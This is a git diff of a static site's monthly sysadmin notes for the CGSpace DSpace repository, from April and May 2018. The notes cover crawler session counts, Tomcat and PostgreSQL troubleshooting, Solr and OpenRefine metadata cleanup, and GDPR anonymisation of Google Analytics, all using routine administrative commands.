<pre tabindex="0"><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &#34;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&#34; 200 2638 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
</code></pre><ul>
<li>And for some reason Yandex created a lot of Tomcat sessions today:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-04-10
4363
</code></pre><ul>
<li>70.32.83.92 appears to be some harvester we&rsquo;ve seen before, but on a new IP</li>
<li>They are not creating new Tomcat sessions so there is no problem there</li>
<li>178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38&#39; dspace.log.2018-04-10
3982
</code></pre><ul>
<li>I&rsquo;m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve</li>
<li>Let&rsquo;s try a manual request with and without their user agent:</li>
</ul>
<pre><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg &#39;User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#39;
GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -294,7 +294,7 @@ X-XSS-Protection: 1; mode=block
<ul>
<li>In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2018&#34;
2266594
real 0m13.658s
@ -303,25 +303,25 @@ sys 0m1.087s
</code></pre><ul>
<li>In other other news, the database cleanup script has an issue again:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(151626) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(151626) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);&#39;
UPDATE 1
</code></pre><ul>
<li>Looking at abandoned connections in Tomcat:</li>
</ul>
<pre><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
2115
</code></pre><ul>
<li>Apparently from these stacktraces we should be able to see which code is not closing connections properly</li>
<li>Here&rsquo;s a pretty good overview of days where we had database issues recently:</li>
</ul>
<pre><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; | awk &#39;{print $1,$2, $3}&#39; | sort | uniq -c | sort -n
1 Feb 18, 2018
1 Feb 19, 2018
1 Feb 20, 2018
@ -356,7 +356,7 @@ UPDATE 1
<ul>
<li>DSpace Test (linode19) crashed again some time since yesterday:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
168
</code></pre><ul>
<li>I ran all system updates and rebooted the server</li>
@ -374,12 +374,12 @@ UPDATE 1
<ul>
<li>While testing an XMLUI patch for <a href="https://jira.duraspace.org/browse/DS-3883">DS-3883</a> I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:</li>
</ul>
<pre><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &quot;solr.authority.server&quot; property in the dspace.cfg
<pre tabindex="0"><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &#34;solr.authority.server&#34; property in the dspace.cfg
java.lang.NullPointerException
</code></pre><ul>
<li>I assume we need to remove <code>authority</code> from the consumers in <code>dspace/config/dspace.cfg</code>:</li>
</ul>
<pre><code>event.dispatcher.default.consumers = authority, versioning, discovery, eperson, harvester, statistics,batchedit, versioningmqm
<pre tabindex="0"><code>event.dispatcher.default.consumers = authority, versioning, discovery, eperson, harvester, statistics,batchedit, versioningmqm
</code></pre><ul>
<li>I see the same error on DSpace Test so this is definitely a problem</li>
<li>After disabling the authority consumer I no longer see the error</li>
@ -387,7 +387,7 @@ java.lang.NullPointerException
<li>File a ticket on DSpace&rsquo;s Jira for the <code>target=&quot;_blank&quot;</code> security and performance issue (<a href="https://jira.duraspace.org/browse/DS-3891">DS-3891</a>)</li>
<li>I re-deployed DSpace Test (linode19) and was surprised by how long it took the ant update to complete:</li>
</ul>
<pre><code>BUILD SUCCESSFUL
<pre tabindex="0"><code>BUILD SUCCESSFUL
Total time: 4 minutes 12 seconds
</code></pre><ul>
<li>The Linode block storage is much slower than the instance storage</li>
@ -404,7 +404,7 @@ Total time: 4 minutes 12 seconds
<li>They will need to use OpenSearch, but I can&rsquo;t remember all the parameters</li>
<li>Apparently search sort options for OpenSearch are in <code>dspace.cfg</code>:</li>
</ul>
<pre><code>webui.itemlist.sort-option.1 = title:dc.title:title
<pre tabindex="0"><code>webui.itemlist.sort-option.1 = title:dc.title:title
webui.itemlist.sort-option.2 = dateissued:dc.date.issued:date
webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
webui.itemlist.sort-option.4 = type:dc.type:text
@ -422,27 +422,27 @@ webui.itemlist.sort-option.4 = type:dc.type:text
<li>They are missing the <code>order</code> parameter (ASC vs DESC)</li>
<li>I notice that DSpace Test has crashed again, due to memory:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
178
</code></pre><ul>
<li>I will increase the JVM heap size from 5120M to 6144M, though we don&rsquo;t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace</li>
<li>Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats</li>
<li>I got a list of all the CIP collections manually and use the same query that I used in <a href="/cgspace-notes/2017-08">August, 2017</a>:</li>
</ul>
<pre><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/89347&#39;, &#39;10568/88229&#39;, &#39;10568/53086&#39;, &#39;10568/53085&#39;, &#39;10568/69069&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/70150&#39;, &#39;10568/53093&#39;, &#39;10568/64874&#39;, &#39;10568/53094&#39;))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
</code></pre><h2 id="2018-04-19">2018-04-19</h2>
<ul>
<li>Run updates on DSpace Test (linode19) and reboot the server</li>
<li>Also try deploying updated GeoLite database during ant update while re-deploying code:</li>
</ul>
<pre><code>$ ant update update_geolite clean_backups
<pre tabindex="0"><code>$ ant update update_geolite clean_backups
</code></pre><ul>
<li>I also re-deployed CGSpace (linode18) to make the ORCID search, authority cleanup, CCAFS project tag <code>PII-LAM_CSAGender</code> live</li>
<li>When re-deploying I also updated the GeoLite databases so I hope the country stats become more accurate&hellip;</li>
<li>After re-deployment I ran all system updates on the server and rebooted it</li>
<li>After the reboot I forced a reïndexing of the Discovery to populate the new ORCID index:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 73m42.635s
user 8m15.885s
@ -456,21 +456,21 @@ sys 2m2.687s
<li>I confirm that it&rsquo;s just giving a white page around 4:16</li>
<li>The DSpace logs show that there are no database connections:</li>
</ul>
<pre><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-715] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle:0; lastwait:5000].
<pre tabindex="0"><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-715] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle:0; lastwait:5000].
</code></pre><ul>
<li>And there have been shit tons of errors in the DSpace log (starting only 20 minutes ago luckily):</li>
</ul>
<pre><code># grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.PoolExhaustedException&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
32147
</code></pre><ul>
<li>I can&rsquo;t even log into PostgreSQL as the <code>postgres</code> user, WTF?</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
^C
</code></pre><ul>
<li>Here are the most active IPs today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
917 207.46.13.182
935 213.55.99.121
970 40.77.167.134
@ -484,11 +484,11 @@ sys 2m2.687s
</code></pre><ul>
<li>It doesn&rsquo;t even seem like there is a lot of traffic compared to the previous days:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | wc -l
74931
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &quot;19/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &#34;19/Apr/2018&#34; | wc -l
91073
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &quot;18/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &#34;18/Apr/2018&#34; | wc -l
93459
</code></pre><ul>
<li>I tried to restart Tomcat but <code>systemctl</code> hangs</li>
@ -499,7 +499,7 @@ sys 2m2.687s
<li>Everything is back but I have no idea what caused this—I suspect something with the hosting provider</li>
<li>Also super weird, the last entry in the DSpace log file is from <code>2018-04-20 16:35:09</code>, and then immediately it goes to <code>2018-04-20 19:15:04</code> (three hours later!):</li>
</ul>
<pre><code>2018-04-20 16:35:09,144 ERROR org.dspace.app.util.AbstractDSpaceWebapp @ Failed to record shutdown in Webapp table.
<pre tabindex="0"><code>2018-04-20 16:35:09,144 ERROR org.dspace.app.util.AbstractDSpaceWebapp @ Failed to record shutdown in Webapp table.
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle
:0; lastwait:5000].
at org.apache.tomcat.jdbc.pool.ConnectionPool.borrowConnection(ConnectionPool.java:685)
@ -543,12 +543,12 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Time
<li>One other new thing I notice is that PostgreSQL 9.6 no longer uses <code>createuser</code> and <code>nocreateuser</code>, as those have actually meant <code>superuser</code> and <code>nosuperuser</code> and have been deprecated for <em>ten years</em></li>
<li>So for my notes, when I&rsquo;m importing a CGSpace database dump I need to amend my notes to give super user permission to a user, rather than create user:</li>
</ul>
<pre><code>$ psql dspacetest -c 'alter user dspacetest superuser;'
<pre tabindex="0"><code>$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
</code></pre><ul>
<li>There&rsquo;s another issue with Tomcat in Ubuntu 18.04:</li>
</ul>
<pre><code>25-Apr-2018 13:26:21.493 SEVERE [http-nio-127.0.0.1-8443-exec-1] org.apache.coyote.AbstractProtocol$ConnectionHandler.process Error reading request, ignored
<pre tabindex="0"><code>25-Apr-2018 13:26:21.493 SEVERE [http-nio-127.0.0.1-8443-exec-1] org.apache.coyote.AbstractProtocol$ConnectionHandler.process Error reading request, ignored
java.lang.NoSuchMethodError: java.nio.ByteBuffer.position(I)Ljava/nio/ByteBuffer;
at org.apache.coyote.http11.Http11InputBuffer.init(Http11InputBuffer.java:688)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:672)
@ -594,15 +594,15 @@ $ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

@ -38,7 +38,7 @@ http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
Then I reduced the JVM heap size from 6144 back to 5120m
Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -68,12 +68,12 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -119,7 +119,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<p class="blog-post-meta">
<time datetime="2018-05-01T16:43:54+03:00">Tue May 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -175,7 +175,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>There are lots of errors on language, CRP, and even some encoding errors on abstract fields</li>
<li>I export them and include the hidden metadata fields like <code>dc.date.accessioned</code> so I can filter the ones from 2018-04 and correct them in Open Refine:</li>
</ul>
<pre><code>$ dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
<pre tabindex="0"><code>$ dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
</code></pre><ul>
<li>Abenet sent a list of 46 ORCID identifiers for ILRI authors so I need to get their names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script and merge them into our controlled vocabulary</li>
<li>On the messed up IITA records from 2018-04 I see sixty DOIs in incorrect format (cg.identifier.doi)</li>
@ -185,7 +185,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>Fixing the IITA records from Sisay, sixty DOIs have completely invalid format like <code>http:dx.doi.org10.1016j.cropro.2008.07.003</code></li>
<li>I corrected all the DOIs and then checked them for validity with a quick bash loop:</li>
</ul>
<pre><code>$ for line in $(&lt; /tmp/links.txt); do echo $line; http --print h $line; done
<pre tabindex="0"><code>$ for line in $(&lt; /tmp/links.txt); do echo $line; http --print h $line; done
</code></pre><ul>
<li>Most of the links are good, though one is duplicate and one seems to even be incorrect in the publisher&rsquo;s site so&hellip;</li>
<li>Also, there are some duplicates:
@ -205,7 +205,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>A few more interesting Unicode characters to look for in text fields like author, abstracts, and citations might be: <code>’</code> (0x2019), <code>·</code> (0x00b7), and <code>€</code> (0x20ac)</li>
<li>A custom text facet in OpenRefine with this GREL expression could be good for finding invalid characters or encoding errors in authors, abstracts, etc:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*[(|)].*/)),
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
@ -218,7 +218,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!</li>
<li>Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-05-06-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-05-06-combined.txt
$ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -242,12 +242,12 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I could use it with <a href="https://github.com/okfn/reconcile-csv">reconcile-csv</a> or to populate a Solr instance for reconciliation</li>
<li>This XPath expression gets close, but outputs all items on one line:</li>
</ul>
<pre><code>$ xmllint --xpath '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/node()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmllint --xpath &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/node()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
</code></pre><ul>
<li>Maybe <code>xmlstarlet</code> is better:</li>
</ul>
<pre><code>$ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/text()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmlstarlet sel -t -v &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/text()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and Health
Big Data
Climate Change, Agriculture and Food Security
@ -275,7 +275,7 @@ Livestock and Fish
<li>I told them to get all <a href="https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=com_10568_35697">CIAT records via OAI</a></li>
<li>Just a note to myself, I figured out how to get reconcile-csv to run from source rather than running the old pre-compiled JAR file:</li>
</ul>
<pre><code>$ lein run /tmp/crps.csv name id
<pre tabindex="0"><code>$ lein run /tmp/crps.csv name id
</code></pre><ul>
<li>I tried to reconcile against a CSV of our countries but reconcile-csv crashes</li>
</ul>
@ -310,15 +310,15 @@ Livestock and Fish
<li>Also, I learned how to do something cool with Jython expressions in OpenRefine</li>
<li>This will fetch a URL and return its HTTP response code:</li>
</ul>
<pre><code>import urllib2
<pre tabindex="0"><code>import urllib2
import re
pattern = re.compile('.*10.1016.*')
pattern = re.compile(&#39;.*10.1016.*&#39;)
if pattern.match(value):
get = urllib2.urlopen(value)
return get.getcode()
return &quot;blank&quot;
return &#34;blank&#34;
</code></pre><ul>
<li>I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs</li>
<li>Here the response code would be 200, 404, etc, or &ldquo;blank&rdquo; if there is no URL for that item</li>
@ -329,26 +329,26 @@ return &quot;blank&quot;
<li>I was checking the CIFOR data for duplicates using Atmire&rsquo;s Metadata Quality Module (and found some duplicates actually), but then DSpace died&hellip;</li>
<li>I didn&rsquo;t see anything in the Tomcat, DSpace, or Solr logs, but I saw this in <code>dmesg -T</code>:</li>
</ul>
<pre><code>[Tue May 15 12:10:01 2018] Out of memory: Kill process 3763 (java) score 706 or sacrifice child
<pre tabindex="0"><code>[Tue May 15 12:10:01 2018] Out of memory: Kill process 3763 (java) score 706 or sacrifice child
[Tue May 15 12:10:01 2018] Killed process 3763 (java) total-vm:14667688kB, anon-rss:5705268kB, file-rss:0kB, shmem-rss:0kB
[Tue May 15 12:10:01 2018] oom_reaper: reaped process 3763 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
<li>So the Linux kernel killed Java&hellip;</li>
<li>Maria from Bioversity mailed to say she got an error while submitting an item on CGSpace:</li>
</ul>
<pre><code>Unable to load Submission Information, since WorkspaceID (ID:S96060) is not a valid in-process submission
<pre tabindex="0"><code>Unable to load Submission Information, since WorkspaceID (ID:S96060) is not a valid in-process submission
</code></pre><ul>
<li>Looking in the DSpace log I see something related:</li>
</ul>
<pre><code>2018-05-15 12:35:30,858 INFO org.dspace.submit.step.CompleteStep @ m.garruccio@cgiar.org:session_id=8AC4499945F38B45EF7A1226E3042DAE:submission_complete:Completed submission with id=96060
<pre tabindex="0"><code>2018-05-15 12:35:30,858 INFO org.dspace.submit.step.CompleteStep @ m.garruccio@cgiar.org:session_id=8AC4499945F38B45EF7A1226E3042DAE:submission_complete:Completed submission with id=96060
</code></pre><ul>
<li>So I&rsquo;m not sure&hellip;</li>
<li>I finally figured out how to get OpenRefine to reconcile values from Solr via <a href="https://github.com/codeforkjeff/conciliator">conciliator</a>:</li>
<li>The trick was to use a more appropriate Solr fieldType <code>text_en</code> instead of <code>text_general</code> so that more terms match, for example uppercase and lower case:</li>
</ul>
<pre><code>$ ./bin/solr start
<pre tabindex="0"><code>$ ./bin/solr start
$ ./bin/solr create_core -c countries
$ curl -X POST -H 'Content-type:application/json' --data-binary '{&quot;add-field&quot;: {&quot;name&quot;:&quot;country&quot;, &quot;type&quot;:&quot;text_en&quot;, &quot;multiValued&quot;:false, &quot;stored&quot;:true}}' http://localhost:8983/solr/countries/schema
$ curl -X POST -H &#39;Content-type:application/json&#39; --data-binary &#39;{&#34;add-field&#34;: {&#34;name&#34;:&#34;country&#34;, &#34;type&#34;:&#34;text_en&#34;, &#34;multiValued&#34;:false, &#34;stored&#34;:true}}&#39; http://localhost:8983/solr/countries/schema
$ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
</code></pre><ul>
<li>It still doesn&rsquo;t catch simple mistakes like &ldquo;ALBANI&rdquo; or &ldquo;AL BANIA&rdquo; for &ldquo;ALBANIA&rdquo;, and it doesn&rsquo;t return scores, so I have to select matches manually:</li>
@ -357,9 +357,9 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>I should probably make a general copy field and set it to be the default search field, like DSpace&rsquo;s search core does (see schema.xml):</li>
</ul>
<pre><code>&lt;defaultSearchField&gt;search_text&lt;/defaultSearchField&gt;
<pre tabindex="0"><code>&lt;defaultSearchField&gt;search_text&lt;/defaultSearchField&gt;
...
&lt;copyField source=&quot;*&quot; dest=&quot;search_text&quot;/&gt;
&lt;copyField source=&#34;*&#34; dest=&#34;search_text&#34;/&gt;
</code></pre><ul>
<li>Actually, I wonder how much of their schema I could just copy&hellip;</li>
<li>Apparently the default search field is the <code>df</code> parameter and you could technically just add it to the query string, so no need to bother with that in the schema now</li>
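<li>For example, a quick and untested sketch against the test &ldquo;countries&rdquo; core from above, passing <code>df</code> directly in the query string:</li>
</ul>
<pre tabindex="0"><code>$ curl &#39;http://localhost:8983/solr/countries/select?q=kenya&amp;df=country&#39;
</code></pre>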
@ -370,7 +370,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>Discuss GDPR with James Stapleton
<ul>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store people's names, emails, and phone numbers if they register</li>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store people&rsquo;s names, emails, and phone numbers if they register</li>
<li>We set cookies on the user&rsquo;s computer, but these do not contain personally identifiable information (PII) and they are &ldquo;session&rdquo; cookies which are deleted when the user closes their browser</li>
<li>We use Google Analytics to track website usage, which makes Google the &ldquo;Data Processor&rdquo; and in this case we merely need to <em>limit</em> or <em>obfuscate</em> the information we send to them</li>
<li>As the only personally identifiable information we send is the user&rsquo;s IP address, I think we only need to enable <a href="https://support.google.com/analytics/answer/2763052">IP Address Anonymization</a> in our <code>analytics.js</code> code snippets</li>
@ -381,8 +381,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>I created and merged a pull request to fix the sorting issue in Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/374">#374</a>)</li>
<li>Regarding the IP Address Anonymization for GDPR, I amended the Google Analytics snippet in <code>page-structure-alterations.xsl</code> to:</li>
</ul>
<pre><code>ga('send', 'pageview', {
'anonymizeIp': true
<pre tabindex="0"><code>ga(&#39;send&#39;, &#39;pageview&#39;, {
&#39;anonymizeIp&#39;: true
});
</code></pre><ul>
<li>I tested loading a certain page before and after adding this and afterwards I saw that the parameter <code>aip=1</code> was being sent with the analytics response to Google</li>
